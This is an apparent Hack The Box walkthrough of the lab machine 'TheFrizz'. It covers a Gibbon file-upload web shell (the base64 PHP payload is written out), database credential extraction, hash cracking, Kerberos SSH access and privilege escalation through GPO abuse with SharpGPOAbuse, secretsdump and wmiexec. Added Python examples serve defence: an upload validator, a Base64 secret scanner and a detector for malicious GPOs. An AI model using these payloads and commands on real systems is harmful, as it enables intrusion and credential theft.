Hack The Box: TheFrizz Machine Walkthrough - Medium Difficulty
Introduction to TheFrizz:

In this write-up, we will explore the "TheFrizz" machine from Hack The Box, categorised as a medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective on TheFrizz machine:
The goal of this walkthrough is to complete the "TheFrizz" machine from Hack The Box by achieving the following objectives:
User Flag:
We began by exploiting a file upload vulnerability to gain a web shell on the target. From there, we located the config.php file, which contained database credentials. Using these, we accessed the database locally through mysql.exe, extracted a user hash, and successfully cracked it to obtain the password Jenni_Luvs_Magic23. With these credentials, we logged into the web application and discovered a message detailing an upcoming SSH migration, hinting at Kerberos-based authentication. We generated a Kerberos ticket (f.frizzle.ccache), leveraged it to gain SSH access to the system, and ultimately retrieved the user flag by executing type user.txt.
Root Flag:
After escalating privileges using M.SchoolBus and exploiting the SleepGPO via SharpGPOAbuse, we forced the Group Policy to update with gpupdate.exe /force. We then used secretsdump to gather credentials and leveraged wmiexec to gain a root-level shell. From there, we accessed and read the root flag using the command type root.txt.
Enumerating the TheFrizz Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial 10.10.11.60
Nmap Output:
┌─[dark@parrot]─[~/Documents/htb/thefrizz]
└──╼ $nmap -sC -sV -oA initial 10.10.11.60
# Nmap 7.94SVN scan initiated Thu Aug 21 20:57:38 2025 as: nmap -sC -sV -oA initial 10.10.11.60
Nmap scan report for 10.10.11.60
Host is up (0.16s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
Analysis:
- Port 22 (SSH): OpenSSH for_Windows_9.5 (protocol 2.0) for secure remote access
- Port 53 (DNS): Simple DNS Plus
- Port 80 (HTTP): Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12) web server, redirects to http://frizzdc.frizz.htb/home/
- Port 135 (MSRPC): Microsoft Windows RPC
- Port 139 (NetBIOS-SSN): Microsoft Windows NetBIOS session service
- Port 389 (LDAP): Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
- Port 445 (Microsoft-DS): Windows file sharing and Active Directory services
- Port 464 (kpasswd5): Kerberos password change service
- Port 593 (NCACN_HTTP): Microsoft Windows RPC over HTTP 1.0
- Port 3268 (LDAP): Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
Web Application Exploration on TheFrizz Machine:

This page offers no useful content; the only option available is a Staff Login link located in the upper right corner.

Clicking on the Staff Login redirects to a login page, but we currently do not have valid credentials to proceed with testing.

While examining the framework, I identified it as Gibbon v25.0.00 and found the following three relevant links through online research.
CVE-2023-34598: Local File Inclusion Vulnerability in Gibbon v25.0.0
Gibbon v25.0.0 is susceptible to a Local File Inclusion (LFI) vulnerability, allowing attackers to include and expose the contents of various files within the installation directory in the server's response. This flaw, identified as CVE-2023-34598, poses a significant risk by potentially revealing sensitive information stored in the affected files.

The proof-of-concept (PoC) for this can be found on GitHub here

However, this LFI is limited to reading non-PHP files, indicating certain restrictions. As shown in the screenshot, we attempted to read gibbon.sql. It appears to be included by default and contains nothing of interest.

Let's proceed to test this directly on the website.

The page returns blank, which indicates a positive outcome.
Exploiting Web Vulnerabilities: Gaining a Reverse Shell with Burp Suite

It appears promising when viewed in Burp Suite.

We successfully uploaded dark.php to the website using the payload:
img=image/png;dark,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8%2b&path=dark.php&gibbonPersonID=0000000001
Although any file type could be used, we tested specifically with dark.php.
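The upload succeeds because the application trusts the MIME type declared at the front of the img parameter and writes the decoded bytes to whatever name the path parameter supplies, so a declared image/png can carry a PHP script. The following Python is an added example, not code from the original post or from the Gibbon project: it places that weak pattern next to a hardened validator that checks the decoded bytes against the signature of an allow-listed image type, requires the declared MIME type to agree with the extension, and stores the file under a content-derived name inside a fixed directory. The function names, the /var/www/uploads directory and all sample inputs are assumptions constructed for this example.

```python
import base64
import hashlib
import os

# Allow-listed image extensions and the file signature each must begin with.
ALLOWED_SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MIME_FOR_EXT = {"png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg", "gif": "image/gif"}

# Constructed sample inputs in the "img=<mime>;<tag>,<base64>" shape used by the post.
# The first declares image/png but carries non-image bytes; the second is a minimal PNG stub;
# the third carries PNG bytes but declares a different MIME type.
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
CONSTRUCTED_NON_IMAGE = "image/png;data," + base64.b64encode(b"not a real PNG file").decode()
CONSTRUCTED_PNG = "image/png;data," + base64.b64encode(PNG_STUB).decode()
CONSTRUCTED_MISMATCH = "image/gif;data," + base64.b64encode(PNG_STUB).decode()


def parse_data_uri(img_param: str):
    """Split 'mime;tag,base64' into (declared_mime, decoded_bytes)."""
    header, _, payload = img_param.partition(",")
    declared = header.split(";", 1)[0].strip().lower()
    return declared, base64.b64decode(payload)


def vulnerable_target_path(img_param: str, path_param: str) -> str:
    """Weak pattern: only the declared MIME type is checked, and the caller's
    path (including its extension) is used as the destination unchanged."""
    declared, _ = parse_data_uri(img_param)
    if not declared.startswith("image/"):
        raise ValueError("declared type is not an image")
    return path_param


def hardened_target_path(img_param: str, path_param: str, upload_dir: str = "/var/www/uploads") -> str:
    """Hardened pattern: the extension must be allow-listed, the bytes must start
    with that type's signature, the declared MIME type must agree, and the stored
    name is derived from the content inside a fixed upload directory."""
    declared, raw = parse_data_uri(img_param)
    ext = os.path.splitext(os.path.basename(path_param))[1].lstrip(".").lower()
    if ext not in ALLOWED_SIGNATURES:
        raise ValueError(f"extension {ext!r} is not an allowed image type")
    if not raw.startswith(ALLOWED_SIGNATURES[ext]):
        raise ValueError("file content does not match the expected image signature")
    if declared != MIME_FOR_EXT[ext]:
        raise ValueError("declared MIME type disagrees with the file extension")
    safe_name = hashlib.sha256(raw).hexdigest()[:16] + "." + ext
    return os.path.join(upload_dir, safe_name)


def is_rejected(img_param: str, path_param: str) -> bool:
    """True when the hardened validator refuses the upload."""
    try:
        hardened_target_path(img_param, path_param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("weak validator would write to:", vulnerable_target_path(CONSTRUCTED_NON_IMAGE, "dark.php"))
    print("hardened validator rejects it:", is_rejected(CONSTRUCTED_NON_IMAGE, "dark.php"))
    print("hardened validator accepts a PNG at:", hardened_target_path(CONSTRUCTED_PNG, "avatar.png"))
```

Even with the validator in place, the upload directory should be served with script execution disabled (for Apache, a directory block that removes the PHP handler), so a file that slips through is delivered as static content rather than executed.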

We encountered an error upon execution.

The error displayed in the browser was similar to the one shown above.

We proceeded to test for command execution using the uploaded web shell by sending a request to dark.php with the parameter cmd=whoami (e.g., GET /path/to/dark.php?cmd=whoami or via curl http://target/dark.php?cmd=whoami). If successful, the response should display the current web user. If no output or an error is returned, we will try URL-encoding the command, using alternatives like id or uname -a, and verifying that cmd is the correct parameter used in the PHP payload.

We attempted to run a basic Windows reverse shell through the uploaded web shell, but it failed to execute and did not establish a connection.

Switching to a different reverse shell command/payload produced no response, but this outcome is still useful to note.

We successfully obtained a reverse shell connection back to our system.

Burp Suite shows the connection assigned to the user w.webservice.

Two privileges are enabled, and one is disabled.

After gaining the shell, review the Gibbon configuration file and confirm that the current working directory is within the root of the entire site.
Database Credentials Extraction

In config.php, we found database credentials indicating an account connected to the database:
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
To avoid using port forwarding, we searched the machine for mysql.exe to interact with the database locally.
MySQL Database Enumeration on TheFrizz Machine


After some searching, we located mysql.exe on the machine.

Executing the SQL command above produced no output or effect.

Therefore, we modified the command to include SHOW DATABASES; to verify accessible databases.

We executed:
.\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 --database=gibbon -e "SHOW TABLES;"
The output listed several tables, including gibbonperson.

I then focused on the retrieved hash and attempted to crack it for possible credentials.

The extracted hashes, shown above, were used for the cracking attempt.

The cracking attempt failed due to Hashcat's "separator unmatched" error, indicating an unrecognized hash format.

The hash format likely needs to follow the example shown earlier, ensuring it matches the expected structure for Hashcat to process correctly.


Cracking the hash revealed the password Jenni_Luvs_Magic23.
Staff login enumeration

Since the web shell didn't reveal anything useful, we proceeded to log in to the web application using the cracked credentials and began reviewing its contents.

The red option in the upper right corner caught my attention, and after clicking it, the Message Wall section appeared.


One of the messages stated: Reminder that TODAY is the migration date for our server access methods. Most workflows using PowerShell will not notice a difference (Enter-PSSession). If you encounter any issues, contact Fiona or Marvin between 8am and 4pm to have the pre-requisite SSH client installed on your Mac or Windows laptop.
Bloodhound enumeration on TheFrizz Machine

To analyse the environment with BloodHound, we used the command mentioned above.

The user F.frizzle belongs to Remote Management Users, Domain Users, and the Users group.

The user M.schoolbuss is a member of Desktop Admins and Group Policy Creator Owners.

The error "Clock skew too great" indicates the password is valid, but the local system clock is out of sync, likely running behind the server's time.

Even after synchronising the time using ntpdate, the issue persisted, and the connection still failed.

Using the date command to manually adjust the time resulted in the same "Clock skew too great" error.

Using faketime bypassed the clock skew issue, but the process now appears to be stuck when attempting to establish a session with evil-winrm.
[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
Updating the /etc/krb5.conf file also failed to resolve the issue, and the connection remains unsuccessful.
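Two things decide whether the ticket request in this section goes through: the realm-to-KDC mapping in /etc/krb5.conf, and the offset between the client clock and the DC, which MIT Kerberos rejects once it exceeds the default clockskew of 300 seconds. The Python below is an added example, not part of the original post: it parses the krb5.conf shown above, reports the mistakes that most often break kinit (missing or lower-case default_realm, a realm with no kdc, a domain_realm entry pointing at an undefined realm), and computes the skew from the Date header that the DC's web server on port 80 returns, which is a quick way to see how far off the local clock is before touching Kerberos. The function names, MAX_SKEW_SECONDS, LOCAL_TIME_CONSTRUCTED (set to the time stamp of the post's nmap scan) and the Date header values are assumptions constructed for this example.

```python
import re
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# The /etc/krb5.conf from the post, reproduced here as the sample input.
KRB5_CONF_FROM_POST = """
[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
"""

MAX_SKEW_SECONDS = 300  # MIT Kerberos default "clockskew" (5 minutes)

# Constructed local clock value (the time stamp of the post's nmap scan).
LOCAL_TIME_CONSTRUCTED = datetime(2025, 8, 21, 20, 57, 38, tzinfo=timezone.utc)


def parse_krb5_conf(text: str) -> dict:
    """Parse krb5.conf into nested dicts: section -> key -> value or sub-dict."""
    sections, stack = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        header = re.fullmatch(r"\[(\w+)\]", line)
        if header:
            stack = [sections.setdefault(header.group(1), {})]
            continue
        if not stack:
            continue
        if line == "}":
            stack.pop()
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if value == "{":
            stack.append(stack[-1].setdefault(key, {}))
        else:
            stack[-1][key] = value
    return sections


def check_krb5_conf(conf: dict) -> list:
    """Return human-readable findings for the mistakes that most often break kinit."""
    findings = []
    realm = conf.get("libdefaults", {}).get("default_realm")
    realms = conf.get("realms", {})
    if not realm:
        findings.append("no default_realm in [libdefaults]")
    elif realm != realm.upper():
        findings.append(f"default_realm {realm!r} is not upper-case (realm names are case-sensitive)")
    if realm and realm not in realms:
        findings.append(f"[realms] has no entry for {realm}")
    elif realm and "kdc" not in realms[realm]:
        findings.append(f"[realms] entry {realm} names no kdc")
    for domain, mapped in conf.get("domain_realm", {}).items():
        if mapped not in realms:
            findings.append(f"[domain_realm] maps {domain} to undefined realm {mapped}")
    return findings


def remote_time_from_http_date(date_header: str) -> datetime:
    """Turn the value of an HTTP 'Date:' response header (as sent by the
    DC's Apache on port 80) into a timezone-aware datetime."""
    return parsedate_to_datetime(date_header)


def clock_skew_seconds(local: datetime, remote: datetime) -> float:
    """Positive when the remote clock is ahead of the local one."""
    return (remote - local).total_seconds()


def skew_within_tolerance(local: datetime, remote: datetime) -> bool:
    """True when Kerberos would accept the offset without a time fix."""
    return abs(clock_skew_seconds(local, remote)) <= MAX_SKEW_SECONDS


if __name__ == "__main__":
    conf = parse_krb5_conf(KRB5_CONF_FROM_POST)
    print("krb5.conf findings:", check_krb5_conf(conf) or "none")
    remote = remote_time_from_http_date("Thu, 21 Aug 2025 21:10:00 GMT")  # constructed header
    skew = clock_skew_seconds(LOCAL_TIME_CONSTRUCTED, remote)
    print(f"skew {skew:+.0f}s, within tolerance: {skew_within_tolerance(LOCAL_TIME_CONSTRUCTED, remote)}")
```

The skew figure this reports is the amount by which the client clock has to move; if it stays outside the tolerance after a time sync, the sync itself is not taking effect, which matches the symptom described above.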

We successfully generated an f.frizzle.ccache Kerberos ticket.

SSH access to the target system was successfully obtained.

We obtained the user flag by executing the command type user.txt.
Escalating to Root Privileges


An alternative faketime command also worked successfully, as demonstrated earlier.

While exploring the machine, Get-ChildItem showed content inside the Recycle.Bin folder.

We found two .7z archive files in the Recycle.Bin folder for further analysis.

Move the .7z files to the ProgramData directory to simplify access and analysis.

We were able to transfer files using the nc.cat command, as demonstrated earlier.

The file transfer eventually completes, though it may take a long time, around 2 hours in my case, though the duration may vary for others.

The wapt directory contains numerous files and folders.


I noticed a password that has been encoded using Base64.

As a result, I successfully uncovered a password: !suBcig@MehTed!R.
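Base64 is an encoding, not a protection, so a credential stored that way in a configuration file is effectively plaintext. The Python below is an added example, not code from the original post or from the WAPT project: a small scanner that walks key=value lines, picks out keys whose names suggest a credential, and reports any value that is a valid Base64 string decoding to readable text. It reports the line, the key and the decoded length rather than the secret itself, so the output can be logged safely. The key patterns, function names and the configuration excerpt (including its placeholder password) are assumptions constructed for this example.

```python
import base64
import re
import string

# Key names that suggest a credential; matching is case-insensitive.
CREDENTIAL_KEYS = re.compile(r"(pass(word)?|pwd|secret|token)", re.I)
# A run of Base64 characters long enough to be worth decoding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")
PRINTABLE = set(string.printable) - set("\x0b\x0c")

# Constructed configuration excerpt. The dbpassword value is the Base64 form of
# the placeholder "Constructed-Placeholder-Pw", computed here so the sample is honest.
CONSTRUCTED_CONFIG = "\n".join([
    "[global]",
    "wapt_server = https://example.invalid",
    "verify_cert = " + base64.b64encode(b"0").decode(),
    "dbpassword = " + base64.b64encode(b"Constructed-Placeholder-Pw").decode(),
    "version = 2.5",
])


def decode_if_text(token: str):
    """Return the decoded text when token is valid Base64 for printable UTF-8, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except Exception:
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if text and all(c in PRINTABLE for c in text) else None


def find_encoded_secrets(config_text: str) -> list:
    """Return (line_number, key, decoded_length) for credential-like keys whose
    value contains Base64 that decodes to readable text."""
    hits = []
    for lineno, line in enumerate(config_text.splitlines(), 1):
        key, sep, value = line.partition("=")
        if not sep or not CREDENTIAL_KEYS.search(key):
            continue
        for match in B64_RUN.finditer(value):
            decoded = decode_if_text(match.group(0))
            if decoded:
                hits.append((lineno, key.strip(), len(decoded)))
    return hits


if __name__ == "__main__":
    for lineno, key, length in find_encoded_secrets(CONSTRUCTED_CONFIG):
        print(f"line {lineno}: key {key!r} holds a Base64-encoded text value ({length} chars)")
```

The same check is worth running over backups and archives such as the ones recovered here, since a copy of a configuration file keeps its secrets long after the live file has been rotated.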

We can identify the potential user accounts as shown above.

We consolidated all the potential user accounts and credentials into a single file for easier reference.

Many users experienced KDC_ERR_PREAUTH_FAILED errors, but one user (frizz.htb\M.SchoolBus) with password !suBcig@MehTed!R returned a KRB_AP_ERR_SKEW error.

As before, we executed the same command, but this time replaced F.Frizzle with M.SchoolBus.
Group Policy Exploitation

We created a new Group Policy Object and linked it with the command:
New-GPO -Name SleepGPO -Comment "Sleep is good" | New-GPLink -Target "DC=FRIZZ,DC=HTB" -LinkEnabled Yes
The command creates a new Group Policy Object (GPO) named SleepGPO with the comment "Sleep is good". A GPO is basically a set of rules or settings that can be applied to computers or users in a network. The command then links this GPO to the main network domain FRIZZ.HTB, making it active and enforcing the rules or settings defined in it.

We uploaded SharpGPOAbuse onto the victim's machine to prepare for further Group Policy exploitation.

We used SharpGPOAbuse to elevate privileges by modifying the previously created GPO. The command
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName "SleepGPO"
adds the user M.SchoolBus as a local administrator on targeted machines by leveraging the SleepGPO. Essentially, this allows M.SchoolBus to gain administrative rights across the network through the Group Policy.

The command gpupdate.exe /force is used to immediately apply updated Group Policy settings, ensuring that changes made by tools like SharpGPOAbuse take effect on target machines without waiting for the default refresh interval (typically 90 minutes). This forces a refresh of both user and computer policies, applying any new or modified Group Policy Objects (GPOs) instantly.
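The --AddLocalAdmin change above is not invisible: it is written into the GPO's security template in SYSVOL (Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf) as a Restricted Groups entry under [Group Membership], with a key of the form *S-1-5-32-544__Members naming the account added to the local Administrators group. The Python below is an added detection example, not code from the original post or from SharpGPOAbuse: it parses such a template, flags every privileged local group that gains members, and can walk a copy of the Policies folder to review every GPO at once. The group list, function names and the constructed GptTmpl.inf (whose member SID is a placeholder) are assumptions made for this example.

```python
import os

# Built-in local groups whose membership a malicious GPO typically targets.
PRIVILEGED_LOCAL_GROUPS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-555": "Remote Desktop Users",
    "S-1-5-32-580": "Remote Management Users",
}

# Constructed GptTmpl.inf in the shape a Restricted Groups "add member" change takes.
# The member SID below is a placeholder, not a real account.
CONSTRUCTED_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-0000000000-0000000000-0000000000-1106
"""


def parse_inf(text: str) -> dict:
    """Minimal INF parser: section -> key -> value (keys keep their case and '*' prefix)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1], {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        current[key] = value
    return sections


def restricted_group_additions(text: str) -> list:
    """Return (group_sid, group_name, [member_sids]) for every privileged local
    group that the template populates through a '<sid>__Members' entry."""
    findings = []
    for key, value in parse_inf(text).get("Group Membership", {}).items():
        if not key.endswith("__Members"):
            continue
        group = key[: -len("__Members")].lstrip("*")
        if group not in PRIVILEGED_LOCAL_GROUPS:
            continue
        members = [m.strip().lstrip("*") for m in value.split(",") if m.strip()]
        if members:
            findings.append((group, PRIVILEGED_LOCAL_GROUPS[group], members))
    return findings


def read_inf_text(path: str) -> str:
    """GptTmpl.inf is normally written as UTF-16 with a BOM; fall back to UTF-8."""
    with open(path, "rb") as handle:
        data = handle.read()
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16")
    return data.decode("utf-8-sig", errors="replace")


def scan_policies(root: str) -> list:
    """Walk a copy of the SYSVOL Policies folder and report every GptTmpl.inf
    that adds members to a privileged local group."""
    report = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower() == "gpttmpl.inf":
                path = os.path.join(dirpath, name)
                for _, group_name, members in restricted_group_additions(read_inf_text(path)):
                    report.append((path, group_name, members))
    return report


if __name__ == "__main__":
    for group_sid, group_name, members in restricted_group_additions(CONSTRUCTED_GPTTMPL):
        print(f"Restricted Groups adds {members} to {group_name} ({group_sid})")
```

A hit from this scan should be correlated with who created or linked the GPO; with Directory Service Changes auditing enabled on the DC, the new groupPolicyContainer shows up as event 5137 and the gPLink change on the domain object as event 5136, both carrying the creating account, which is how a member of Group Policy Creator Owners such as M.SchoolBus would be tied to the change.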

The command secretsdump was executed to extract credential information from the target system, enabling further enumeration and exploitation.

We leveraged wmiexec to execute commands remotely and gain a root-level shell on the target system.


We obtained the root flag by accessing the root shell and executing type root.txt.
The post Hack The Box: TheFrizz Machine Walkthrough - Medium Difficulty appeared first on Threatninja.net.